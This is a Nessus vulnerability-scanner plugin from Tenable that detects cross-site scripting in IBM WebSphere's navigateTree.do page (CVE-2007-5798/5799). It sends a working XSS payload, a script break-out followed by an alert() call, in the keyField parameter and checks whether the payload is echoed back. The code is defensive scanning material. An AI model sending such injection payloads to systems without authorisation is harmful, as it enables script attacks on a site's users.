#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(27803);
  script_version("$Revision: 1.1 $");

  script_cve_id("CVE-2007-5798", "CVE-2007-5799");
  script_bugtraq_id(26276);

  script_name(english:"IBM WebSphere Application Server navigateTree.do Page Vulnerabilities");
  script_summary(english:"Checks for an XSS flaw in WAS' navigateTree.do");

  desc = "
Synopsis :

The remote web server contains a script that is affected by various
cross-site scripting and cross-site request forgery vulnerabilities. 

Description :

The version of IBM WebSphere Application installed on the remote host
fails to sanitize input to the 'keyField', 'nameField', 'valueField',
and 'frameReturn' parameters of the 'uddigui/navigateTree.do' script
before using it to generate dynamic content.  An unauthenticated
remote attacker may be able to leverage this issue to inject arbitrary
HTML or script code into a user's browser to be executed within the
security context of the affected site. 

See also :

http://www-1.ibm.com/support/docview.wss?uid=swg1PK50245

Solution :

Apply WebSphere Application Server 6.1.0 fix pack 13 or later. 

Risk factor :

Medium / CVSS Base Score : 4.3
(CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_require_ports("Services/www", 9080, 9443);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_kb_item("Services/www");
if (!port) port = 9080;
if (!get_port_state(port)) port = 9443;
if (!get_port_state(port)) exit(0);
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);


# Unless we're paranoid, make sure the banner looks like WAS.
if (report_paranoia < 2)
{
  banner = get_http_banner(port:port);
  if (!banner || "Server: WebSphere Application Server/" >!< banner) exit(0);
}


# Send a request to exploit the flaw.
xss = string("nessus.value=value;}</script>\r\n<script>alert('", SCRIPT_NAME, "')</script>");

req = http_get(
  item:string(
    "/uddigui/navigateTree.do?",
    "keyField=", urlencode(str:xss)
  ), 
  port:port  
);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (res == NULL) exit(0);


# There's a problem if our exploit appears in the xferName function.
if (
  "function xferName" >< res &&
  string("parent.detail.document.forms[0].", xss, ".value = key;") >< res
) security_warning(port);
